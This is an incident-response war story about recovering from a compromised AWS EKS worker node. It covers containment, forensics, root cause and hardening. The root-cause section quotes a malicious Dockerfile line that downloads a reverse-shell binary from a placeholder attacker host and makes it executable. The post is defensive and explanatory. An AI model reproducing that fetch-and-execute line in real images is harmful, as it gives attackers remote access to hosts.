
ANKUSH CHOUDHARY JOHAL

Originally published at johal.in

War Story: Recovering From an AWS GuardDuty 2026 Alert for a Compromised EKS Node

It was 6:47 PM on a Friday in October 2026 when my pager went off. The alert: AWS GuardDuty had flagged a critical threat for our production EKS cluster, signaling a compromised worker node. What followed was a 4-hour incident response sprint that tested our team’s EKS security posture, incident response playbooks, and ability to stay calm under pressure.

The GuardDuty Alert

GuardDuty’s EKS Protection feature, which we’d enabled earlier that year, had triggered an EKSNodeRuntimeThreat: Suspicious Reverse Shell Execution finding. The alert details pointed to a single worker node in our prod-us-east-1-eks-cluster cluster, part of the ng-prod-worker node group:

  • Node ID: i-0123456789abcdef0
  • Suspicious process: /tmp/revshell (MD5 hash matching known malware in GuardDuty’s 2026 threat intel feed)
  • Outbound connection: 198.51.100.23:4444 (known command-and-control IP)
  • Abnormal IAM activity: The node’s IAM role had attempted to assume a role in our staging account, an action never before logged for this node.

GuardDuty also noted that the node was running a container image pulled from a public Docker Hub repository, which violated our internal policy of only using images from Amazon ECR.
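If you need to pull the full finding outside the console, the GuardDuty CLI handles it. A minimal sketch (the detector ID and finding ID are placeholders; the severity filter assumes you only care about high-severity findings):

    # Find the detector for this account/region (there is normally exactly one)
    aws guardduty list-detectors

    # List high-severity findings, then fetch the full details for triage
    aws guardduty list-findings \
      --detector-id <detector-id> \
      --finding-criteria '{"Criterion":{"severity":{"Gte":7}}}'
    aws guardduty get-findings \
      --detector-id <detector-id> \
      --finding-ids <finding-id>

Having these in the playbook makes it easy to script evidence collection instead of copy-pasting from the console under pressure.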

Initial Containment

We followed our incident response (IR) playbook’s first rule: contain the threat before investigating. For EKS nodes, that meant isolating the node from the cluster and preserving forensic evidence:

  1. Cordon the node to prevent new pods from scheduling: kubectl cordon i-0123456789abcdef0
  2. Drain existing pods (ignoring daemonsets, which are cluster-critical): kubectl drain i-0123456789abcdef0 --ignore-daemonsets --delete-emptydir-data
  3. Take a snapshot of the node’s root EBS volume for post-incident forensics, to avoid destroying evidence by terminating the node immediately.
  4. Terminate the compromised node, triggering the node group’s Auto Scaling group to launch a replacement node with the latest EKS-optimized AMI (steps 3 and 4 are sketched with the AWS CLI right after this list).
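A minimal sketch of steps 3 and 4 with the AWS CLI, using the instance ID from the finding (the query assumes the root volume is the first block device mapping; adjust for your own instances):

    # Step 3: snapshot the node's root EBS volume before the instance goes away
    ROOT_VOL=$(aws ec2 describe-instances \
      --instance-ids i-0123456789abcdef0 \
      --query 'Reservations[0].Instances[0].BlockDeviceMappings[0].Ebs.VolumeId' \
      --output text)
    aws ec2 create-snapshot \
      --volume-id "$ROOT_VOL" \
      --description "forensics: GuardDuty EKS incident"

    # Step 4: terminate via the Auto Scaling group so the node group launches a replacement
    aws autoscaling terminate-instance-in-auto-scaling-group \
      --instance-id i-0123456789abcdef0 \
      --no-should-decrement-desired-capacity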

Within 22 minutes, the compromised node was isolated, all pods were safely rescheduled to healthy nodes, and a replacement node was online. No customer traffic was impacted thanks to the drain process.

Root Cause Analysis

We mounted the EBS snapshot to a forensic EC2 instance to investigate how the attacker gained access. Key findings:

  • A developer had deployed a hotfix for a frontend service earlier that day, overriding the image pull policy to use a public Docker Hub image (which contained a malicious layer) rather than waiting for an ECR image scan. The image’s Dockerfile included a RUN curl -o /tmp/revshell http://malicious-registry.example.com/revshell && chmod +x /tmp/revshell instruction that baked the reverse shell binary into the image, and the container’s entrypoint launched it on startup.
  • The frontend pod was running as root with no security context, allowing the malicious process to escape the container (via a known 2025 runc vulnerability that we hadn’t patched on the node) and gain host-level access.
  • The node’s IAM role had overly permissive policies: sts:AssumeRole permissions for all accounts in our organization, which the attacker used to attempt lateral movement to our staging account.
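The snapshot mounting itself is just EBS plumbing. A rough sketch (the snapshot, volume, and instance IDs are placeholders, and the device name inside the instance may differ, e.g. /dev/nvme1n1p1 on Nitro instance types):

    # Create a volume from the forensic snapshot and attach it to the analysis instance
    aws ec2 create-volume \
      --snapshot-id snap-0abc1234example \
      --availability-zone us-east-1a
    aws ec2 attach-volume \
      --volume-id vol-0def5678example \
      --instance-id i-0fedcba9876543210 \
      --device /dev/sdf

    # On the forensic instance: mount read-only, with noexec so nothing on the disk can run
    sudo mkdir -p /mnt/forensics
    sudo mount -o ro,noexec,nosuid /dev/xvdf1 /mnt/forensics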

Remediation and Hardening

Once the root cause was identified, we implemented short-term fixes and long-term hardening measures:

Short-Term (Completed Within 24 Hours)

  • Revoked all active sessions for the compromised node’s IAM role (the deny policy we used is sketched after this list) and rotated credentials for any principals the attacker had attempted to assume.
  • Patched all EKS nodes to the latest EKS-optimized AMI with the runc vulnerability fix, and enabled automatic node group updates.
  • Scanned all running container images in the cluster using Amazon ECR image scanning, removing any public images and replacing them with ECR-hosted, scanned alternatives.
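The session revocation in the first bullet is just an inline deny policy keyed on token issue time, which is what the console’s “Revoke sessions” action attaches under the hood. A sketch with a placeholder role name and timestamp:

    # Deny everything for credentials issued before containment; new sessions are unaffected
    aws iam put-role-policy \
      --role-name prod-eks-node-role \
      --policy-name RevokeOldSessions \
      --policy-document '{
        "Version": "2012-10-17",
        "Statement": [{
          "Effect": "Deny",
          "Action": "*",
          "Resource": "*",
          "Condition": {"DateLessThan": {"aws:TokenIssueTime": "2026-10-23T19:15:00Z"}}
        }]
      }'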

Long-Term (Completed Within 2 Weeks)

  • Deployed OPA Gatekeeper as an admission controller to block all pods using non-ECR images, enforcing our image pull policy at the API server level (constraint sketched after this list).
  • Migrated all pod-level IAM access to IAM Roles for Service Accounts (IRSA), removing all sts:AssumeRole permissions from node IAM roles.
  • Enforced EKS Pod Security Standards (restricted profile) across all namespaces, requiring all pods to run as non-root, with read-only root filesystems, and no privileged access.
  • Enabled EKS Audit Logging to CloudWatch Logs, and set up CloudWatch alarms for GuardDuty findings, unauthorized API calls, and IAM role assumption attempts.
  • Updated our IR playbook to include EKS-specific containment steps, and conducted a tabletop exercise with the on-call team to practice the process.
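Two of these controls are easy to show concretely. First, the image-source constraint: this sketch assumes the K8sAllowedRepos template from the gatekeeper-library project is already installed, and the account ID and repo prefix are placeholders:

    cat <<'EOF' | kubectl apply -f -
    apiVersion: constraints.gatekeeper.sh/v1beta1
    kind: K8sAllowedRepos
    metadata:
      name: ecr-images-only
    spec:
      match:
        kinds:
          - apiGroups: [""]
            kinds: ["Pod"]
      parameters:
        repos:
          - "123456789012.dkr.ecr.us-east-1.amazonaws.com/"
    EOF

Second, Pod Security Standards enforcement is just namespace labels (the PodSecurity admission controller is built into Kubernetes 1.25+); the namespace name here is illustrative:

    kubectl label namespace frontend \
      pod-security.kubernetes.io/enforce=restricted \
      pod-security.kubernetes.io/enforce-version=latest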

Lessons Learned

This incident reinforced three key lessons for our team:

  1. Never bypass security policies for expediency: the hotfix that caused the breach saved 30 minutes of waiting for an image scan, but cost 4 hours of incident response and put our production environment at risk.
  2. Defense in depth works: GuardDuty caught the threat early, but combining it with admission controllers, pod security standards, and IR playbooks prevented lateral movement and customer impact.
  3. Least privilege is non-negotiable: the node’s IAM role had far more permissions than needed, which could have led to a much worse breach if the attacker had succeeded in assuming the staging account role.

By 11:30 PM that Friday, we’d closed the incident, documented all findings, and started work on hardening measures. The GuardDuty alert had been a wake-up call, but it ultimately made our EKS environment far more secure than it was before.
